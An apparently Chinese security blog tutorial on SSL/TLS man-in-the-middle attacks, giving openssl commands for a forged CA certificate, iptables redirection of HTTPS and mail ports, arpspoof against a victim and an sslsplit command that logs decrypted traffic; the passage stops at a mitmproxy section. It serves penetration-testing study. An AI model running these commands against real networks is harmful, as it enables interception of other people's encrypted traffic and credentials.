

<!DOCTYPE html>
<html lang="zh-CN">
<!--begin head-->

<head>
    <meta charset="utf-8">
<!--begin title-->

<title>
    
    SSL_TSL中间人攻击 |
    
    Cat++</title>
<!--end title-->
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<!--begin mete-->

<meta name="description" content="猫大仙儿的修仙之路"/>

<meta name="author" content="Cat"/>

<!--end mete-->
<!--begin keywords-->
<meta name="keywords" content="802.11,ACK,AJAX,ARP欺骗,Aircrack-ng,CVE,DOM,DOS攻击,GOOGLE HACKING,Heartbleed,Monitor,Probe,SHODAN,SSLsplit,Scapy,WDS,ZAP,crunch,kali,mimikatz,pinjector,python,sslscan,traceroute,主动信息收集,全向天线,加密算法,字典,定向天线,密码破解,扫描开发,拒绝服务攻击,提权,无线协议,无线技术,无线抓包,无线数据帧,无线模式,无线破解,无线通信,渗透,漏洞利用,漏洞库,漏洞扫描,漏洞提权,管理帧,缓冲区溢出,被动信息收集,路由追踪"/>
<!--end keywords-->
<!--begin rss-->

<link rel="alternate" href="/atom.xml" title="Cat++" type="application/atom+xml">

<!--end rss-->
<!--begin favicon-->

<link rel="icon" href="/favicon.ico">

<!--end favicon-->
<!--begin style-->

<!-- stylesheets list from config.yml -->

<link rel="stylesheet" href="/css/hannah.css">


<!--end style-->
<meta name="generator" content="Hexo 4.2.0"></head>
<!--end head-->
<!--begin body-->

<body class="container-fluid">

    <!--begin menu-->
    <div class="hannah-menu">
    <i class="fh fh-ravelry fa-2x btn fixed-menu animated bounce" id="btn_menu" aria-hidden="true"></i>
    <div class="menu-outer container-fluid hide animated" id="div_menu">
        <div class="row" style="margin-bottom: 5px;">
            
            <div class="col-md-offset-2 col-md-3 col-xs-4 text-center left-social">
                
                <a target="_blank" href="https://github.com/iseanhe" title="GitHub"><i class="fh fh-github"></i></a>
                
                <style>
                    .left-social {
                        height: 132px;
                        line-height: 132px;
                        font-size: 66px;
                    }

                    .left-social * {
                        color: #f1ce8e;
                    }

                    @media (max-width: 767px) {
                        .left-social {
                            line-height: 132px;
                            font-size: 33px;
                        }
                    }
                </style>
            </div>
            <!--begin handImg-->
            <div class="col-md-2 col-xs-4 text-center">
                
                <img src="/img/logo.jpg" alt="Head Image" class="img-circle">
                
            </div>
            <!--end handImg-->
            <div class="col-md-3 col-xs-4 text-center right-social">
                
                <style>
                    .right-social {
                        height: 132px;
                        line-height: 132px;
                        font-size: 66px;
                    }

                    @media (max-width: 767px) {
                        .right-social {
                            line-height: 132px;
                            font-size: 33px;
                        }
                    }

                    .right-social * {
                        color: #f1ce8e;
                    }
                </style>
            </div>
        </div>
        <div class="row">
            <div class="menu-content col-md-8 col-md-push-2 col-xs-12 ">
                <dl class="menu-content-item">
                    <dt class="menu-content-title">
                        <i class="fh fh-bars" aria-hidden="true"></i> Menu
                    </dt>
                    <dd class="menu-content-content">
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/" class="btn btn-block">
                                
                                <i class="fh fh-ravelry"></i>
                                Home
                            </a>
                        </div>
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/categories" class="btn btn-block">
                                
                                <i class="fh fh-cubes"></i>
                                Category
                            </a>
                        </div>
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/tags" class="btn btn-block">
                                
                                <i class="fh fh-tags"></i>
                                Tag
                            </a>
                        </div>
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/archives" class="btn btn-block">
                                
                                <i class="fh fh-archive"></i>
                                Archives
                            </a>
                        </div>
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/about" class="btn btn-block">
                                
                                <i class="fh fh-about"></i>
                                About
                            </a>
                        </div>
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/doc" class="btn btn-block">
                                
                                <i class="fh fh-document"></i>
                                Doc
                            </a>
                        </div>
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/plug" class="btn btn-block">
                                
                                <i class="fh fh-plug"></i>
                                Plug
                            </a>
                        </div>
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/sitemap" class="btn btn-block">
                                
                                <i class="fh fh-sitemap"></i>
                                SiteMap
                            </a>
                        </div>
                        
                        <div class="col-md-4 col-xs-6 col-sm-4 text-center animated tada">
                            <a href="/atom.xml" class="btn btn-block">
                                <i class="fh fh-rss" aria-hidden="true"></i> RSS
                            </a>
                        </div>
                    </dd>
                </dl>
            </div>
        </div>
        <div class="row">
            <div class="menu-content col-md-8 col-md-offset-2 col-xs-12 ">
                <dl class="col-md-6 col-xs-6 menu-content-item">
                    <dt class="menu-content-title">
                        <i class="fh fh-cubes" aria-hidden="true"></i> Category
                    </dt>
                    <dd class="menu-content-content animated zoomIn">
                        <ul class="menu-cate-list"><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/python/"><i class="fh fh-cube" aria-hidden="true"></i> python</a><span class="menu-cate-list-count">1</span></li><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><i class="fh fh-cube" aria-hidden="true"></i> 渗透测试</a><span class="menu-cate-list-count">20</span><ul class="menu-cate-list-child"><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/Buffer-overflow/"><i class="fh fh-cube" aria-hidden="true"></i> Buffer overflow</a><span class="menu-cate-list-count">1</span></li><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/Web%E6%B8%97%E9%80%8F/"><i class="fh fh-cube" aria-hidden="true"></i> Web渗透</a><span class="menu-cate-list-count">3</span></li><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><i class="fh fh-cube" aria-hidden="true"></i> 信息收集</a><span class="menu-cate-list-count">4</span></li><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3/"><i class="fh fh-cube" aria-hidden="true"></i> 密码破解</a><span class="menu-cate-list-count">1</span></li><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/"><i class="fh fh-cube" aria-hidden="true"></i> 无线渗透</a><span class="menu-cate-list-count">8</span><ul class="menu-cate-list-child"><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/%E6%97%A0%E7%BA%BF%E6%8A%80%E6%9C%AF%E7%90%86%E8%AE%BA/"><i class="fh fh-cube" aria-hidden="true"></i> 无线技术理论</a><span class="menu-cate-list-count">7</span></li><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/%E6%97%A0%E7%BA%BF%E6%94%BB%E5%87%BB/"><i class="fh fh-cube" aria-hidden="true"></i> 无线攻击</a><span class="menu-cate-list-count">1</span></li></ul></li><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/"><i class="fh fh-cube" aria-hidden="true"></i> 权限维持</a><span class="menu-cate-list-count">2</span></li><li class="menu-cate-list-item"><a class="menu-cate-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F/"><i class="fh fh-cube" aria-hidden="true"></i> 漏洞扫描</a><span class="menu-cate-list-count">1</span></li></ul></li></ul>
                    </dd>
                </dl>
                <dl class="col-md-6 col-xs-6 menu-content-item">
                    <dt class="menu-content-title">
                        <i class="fh fh-tag" aria-hidden="true"></i> Tags
                    </dt>
                    <dd class="menu-content-content animated zoomIn">
                        <ul class="menu-tag-list" itemprop="keywords"><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/802-11/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 802.11</a><span class="menu-tag-list-count">3</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/ACK/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> ACK</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/AJAX/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> AJAX</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/ARP%E6%AC%BA%E9%AA%97/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> ARP欺骗</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/Aircrack-ng/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> Aircrack-ng</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/CVE/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> CVE</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/DOM/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> DOM</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/DOS%E6%94%BB%E5%87%BB/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> DOS攻击</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/GOOGLE-HACKING/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> GOOGLE HACKING</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/Heartbleed/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> Heartbleed</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/Monitor/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> Monitor</a><span class="menu-tag-list-count">2</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/Probe/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> Probe</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/SHODAN/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> SHODAN</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/SSLsplit/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> SSLsplit</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/Scapy/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> Scapy</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/WDS/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> WDS</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/ZAP/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> ZAP</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/crunch/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> crunch</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/kali/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> kali</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/mimikatz/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> mimikatz</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/pinjector/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> pinjector</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/python/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> python</a><span class="menu-tag-list-count">3</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/sslscan/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> sslscan</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/traceroute/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> traceroute</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 主动信息收集</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E5%85%A8%E5%90%91%E5%A4%A9%E7%BA%BF/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 全向天线</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E5%8A%A0%E5%AF%86%E7%AE%97%E6%B3%95/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 加密算法</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E5%AD%97%E5%85%B8/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 字典</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E5%AE%9A%E5%90%91%E5%A4%A9%E7%BA%BF/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 定向天线</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 密码破解</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%89%AB%E6%8F%8F%E5%BC%80%E5%8F%91/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 扫描开发</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 拒绝服务攻击</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%8F%90%E6%9D%83/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 提权</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%97%A0%E7%BA%BF%E5%8D%8F%E8%AE%AE/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 无线协议</a><span class="menu-tag-list-count">2</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%97%A0%E7%BA%BF%E6%8A%80%E6%9C%AF/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 无线技术</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%97%A0%E7%BA%BF%E6%8A%93%E5%8C%85/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 无线抓包</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%97%A0%E7%BA%BF%E6%95%B0%E6%8D%AE%E5%B8%A7/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 无线数据帧</a><span class="menu-tag-list-count">2</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%97%A0%E7%BA%BF%E6%A8%A1%E5%BC%8F/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 无线模式</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%97%A0%E7%BA%BF%E7%A0%B4%E8%A7%A3/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 无线破解</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%97%A0%E7%BA%BF%E9%80%9A%E4%BF%A1/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 无线通信</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 渗透</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 漏洞利用</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%BA%93/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 漏洞库</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 漏洞扫描</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 漏洞提权</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E7%AE%A1%E7%90%86%E5%B8%A7/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 管理帧</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 缓冲区溢出</a><span class="menu-tag-list-count">1</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E8%A2%AB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 被动信息收集</a><span class="menu-tag-list-count">2</span></li><li class="menu-tag-list-item"><a class="menu-tag-list-link" href="/tags/%E8%B7%AF%E7%94%B1%E8%BF%BD%E8%B8%AA/" rel="tag"><i class="fh fh-tag" aria-hidden="true"></i> 路由追踪</a><span class="menu-tag-list-count">1</span></li></ul>
                    </dd>
                </dl>
            </div>
        </div>
    </div>
</div>
    <!--end menu-->

    <div class="row hannah-body">
        <div class="col-md-8 col-md-push-2 col-xs-12">
            <!--begin breadcrumb-->
            <div class="bread-crumb">
    <ul class="bread-crumb-menu animated rubberBand">
        <li><a href="/"><i class="fh fh-ravelry" aria-hidden="true"></i> Home</a></li>
        
        <li><a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><i class="fh fh-cube" aria-hidden="true"></i> 渗透测试</a>
        </li>
        
        <li><a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/Web%E6%B8%97%E9%80%8F/"><i class="fh fh-cube" aria-hidden="true"></i> Web渗透</a>
        </li>
        
        <li>
            
            <i class="fh fh-newspaper-o" aria-hidden="true"></i>
            
            SSL_TSL中间人攻击
        </li>
        
    </ul>
    <div class="bread-crumb-search">
        <div class="search">
    <i class="fh fh-search icon-search"></i>
    <input placeholder="Search ..." onkeyup="searchFunc(this,event,'/search.xml')"
           class="input-search animated fadeInRight"/>
    <div class="search-result animated fadeInRight">
        <a class="animated tada col-lg-12 search-result-item result-link" href="/2020/05/18/Wireless_Attacks/%E6%97%A0%E7%BA%BF%E6%8A%80%E6%9C%AF%E7%90%86%E8%AE%BA/WPA%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F/">Wireless_Attacks/无线技术理论/WPA安全系统</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2020/05/18/Wireless_Attacks/%E6%97%A0%E7%BA%BF%E6%8A%80%E6%9C%AF%E7%90%86%E8%AE%BA/RADIOTAP%E5%A4%B4%E9%83%A8/">Wireless_Attacks/无线技术理论/RADIOTAP头部</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2020/05/18/Wireless_Attacks/%E6%97%A0%E7%BA%BF%E6%8A%80%E6%9C%AF%E7%90%86%E8%AE%BA/WEP%E5%8A%A0%E5%AF%86-RC4%E7%AE%97%E6%B3%95/">Wireless_Attacks/无线技术理论/WEP加密-RC4算法</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2018/03/15/Python/Python%E8%8A%B1%E5%BC%8F%E5%AF%BC%E5%8C%85%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%B9%E6%B3%95/">Python花式导包的几种方法</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2015/05/21/Password_Attacks/%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3%E6%96%B9%E6%B3%95%E5%8F%8ACrunch%E5%AD%97%E5%85%B8%E7%94%9F%E6%88%90%E5%B7%A5%E5%85%B7/">密码破解方法及Crunch字典生成工具</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2014/05/21/Web_Attacks/AJAX%E6%8A%80%E6%9C%AF%E7%BB%84%E5%90%88%E5%8F%8AWebService%E5%AE%89%E5%85%A8%E8%80%83%E8%99%91/">AJAX技术组合及WebService安全考虑</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2014/05/19/Web_Attacks/SSL_TSL%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB/">SSL_TSL中间人攻击</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2014/05/18/Web_Attacks/HTTPS%E6%BC%8F%E6%B4%9E%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/">HTTPS漏洞及攻击方法</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2013/08/11/pentest/Windows%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%B5%8B%E8%AF%95/">Windows缓冲区溢出测试</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2013/06/12/Wireless_Attacks/Aircrack-ng%E6%97%A0%E7%BA%BF%E6%94%BB%E5%87%BB%E5%A5%97%E4%BB%B6/">Aircrack-ng无线攻击套件</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2013/06/06/pentest/%E5%88%A9%E7%94%A8%E6%BC%8F%E6%B4%9E%E5%92%8C%E7%A8%8B%E5%BA%8F%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E6%8F%90%E6%9D%83/">利用漏洞和程序配置不当提权</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2013/06/03/pentest/%E6%9C%AC%E5%9C%B0%E6%8F%90%E6%9D%83/">本地提权常见手法</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2013/05/27/Wireless_Attacks/%E6%97%A0%E7%BA%BF%E6%8A%80%E6%9C%AF%E7%90%86%E8%AE%BA/Linux%E6%97%A0%E7%BA%BF%E5%8D%8F%E8%AE%AE%E6%A0%88%E5%8F%8A%E9%85%8D%E7%BD%AE%E5%91%BD%E4%BB%A4/">Linux无线协议栈及配置命令</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2013/05/26/Wireless_Attacks/%E6%97%A0%E7%BA%BF%E6%8A%80%E6%9C%AF%E7%90%86%E8%AE%BA/Management%20Frame/">无线数据帧Management Frame原理</a><a class="animated tada col-lg-12 search-result-item result-link" href="/2013/05/26/Wireless_Attacks/%E6%97%A0%E7%BA%BF%E6%8A%80%E6%9C%AF%E7%90%86%E8%AE%BA/Control%20Frame/">无线数据帧Control Frame原理</a>
    </div>
</div>
    </div>
</div>
            <!--end breadcrumb-->
            <!--begin body-->
            <article class="post animated rollIn">
    <h1 class="post-title">SSL_TSL中间人攻击</h1>
    <div class="post-subtitle">
        
        <time datetime="2014-05-19T10:02:37.000Z" class="item">
            <i class="fh fh-calendar" aria-hidden="true"></i>&nbsp;&nbsp;2014-05-19
        </time>
        
        
        <span class="item">
      <i class="fh fh-cubes" aria-hidden="true"></i>&nbsp;
            
            <a class="label label-primary tags" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">
           <i class="fh fh-cube" aria-hidden="true"></i>&nbsp;渗透测试
        </a>
            
            <a class="label label-primary tags" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/Web%E6%B8%97%E9%80%8F/">
           <i class="fh fh-cube" aria-hidden="true"></i>&nbsp;Web渗透
        </a>
            
        </span>
        
        
        <span class="item">
        <i class="fh fh-tags" aria-hidden="true"></i>&nbsp;
            
            <a class="label label-info tags" href="/tags/ARP%E6%AC%BA%E9%AA%97/">
            <i class="fh fh-tag" aria-hidden="true"></i>&nbsp;ARP欺骗
            </a>
            
            <a class="label label-info tags" href="/tags/SSLsplit/">
            <i class="fh fh-tag" aria-hidden="true"></i>&nbsp;SSLsplit
            </a>
            
            <a class="label label-info tags" href="/tags/DOS%E6%94%BB%E5%87%BB/">
            <i class="fh fh-tag" aria-hidden="true"></i>&nbsp;DOS攻击
            </a>
            
            <a class="label label-info tags" href="/tags/%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB/">
            <i class="fh fh-tag" aria-hidden="true"></i>&nbsp;拒绝服务攻击
            </a>
            
        </span>
        
    </div>
    
    <p>攻击者位于客户端和服务器通信链路中<br>    ARP        // Data link层,修改MAC地址,ARP Spoof让流量流经中间人<br>    DHCP    // 动态主机配置协议,用来自动获取IP<br>    修改网关<br>    修改DNS<br>    修改HOSTS<br>    ICMP,STP,OSPF<br>加密流量        // 伪造证书解密</p>
<p><strong>攻击的前提</strong></p>
<ul>
<li>客户端已经信任伪造证书颁发机构</li>
<li>攻击者控制了核发证书颁发机构</li>
<li>客户端程序禁止了显示证书错误告警信息</li>
<li>攻击者已经控制客户端,并强制其信任伪造证书</li>
</ul>
<h4 id="SSLsplit"><a href="#SSLsplit" class="headerlink" title="SSLsplit"></a><strong>SSLsplit</strong></h4><p>透明SSL/TLS中间人攻击工具<br>对客户端伪造成服务器,对服务器伪装成普通客户端<br>伪装服务器需要伪造证书<br>支持SSL/TLS加密的SMTP,POP3,FTP等通信中间人攻击<br><strong>利用openssl生成证书私钥</strong><br>    <code>openssl genrsa -out ca.key 2048</code><br><strong>利用私钥签名生成证书</strong><br>    <code>openssl reg -new -x509 -days 1096 -key ca.key -out ca.crt</code></p>
<h4 id="启动路由"><a href="#启动路由" class="headerlink" title="启动路由"></a><strong>启动路由</strong></h4><pre><code>sysctl -w net.ipv4.ip_forward=1
cat /proc/sys/net/ipv4/ip_forward
echo 1 &gt; /proc/sys/net/ipv4/ip_forward</code></pre><h4 id="Iptables端口转发规则"><a href="#Iptables端口转发规则" class="headerlink" title="Iptables端口转发规则"></a><strong>Iptables端口转发规则</strong></h4><pre><code>iptables -t nat -F        //清空当前已有规则
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S
iptables -t nat -L        //查看nat规则

netstat -pantu | grep :80        //查看80端口是否被占用</code></pre><h4 id="ARP欺骗"><a href="#ARP欺骗" class="headerlink" title="ARP欺骗"></a><strong>ARP欺骗</strong></h4><pre><code>arpspoof -i eth0 -t 1.1.1.2 -r 1.1.1.1</code></pre><h4 id="启动SSLsplit"><a href="#启动SSLsplit" class="headerlink" title="启动SSLsplit"></a><strong>启动SSLsplit</strong></h4><pre><code>mkdir -p test/logdir
sslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080</code></pre><p>被害者访问taobao,baidu,mail.163.com<br>查看日志和浏览器证书及证书报错信息<br>安装服务器根证书之后再次访问</p>
<h4 id="Mitmproxy"><a href="#Mitmproxy" class="headerlink" title="Mitmproxy"></a><strong>Mitmproxy</strong></h4><pre><code>iptables端口转发规则
iptables -t nat -F        //清空当前已有规则
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
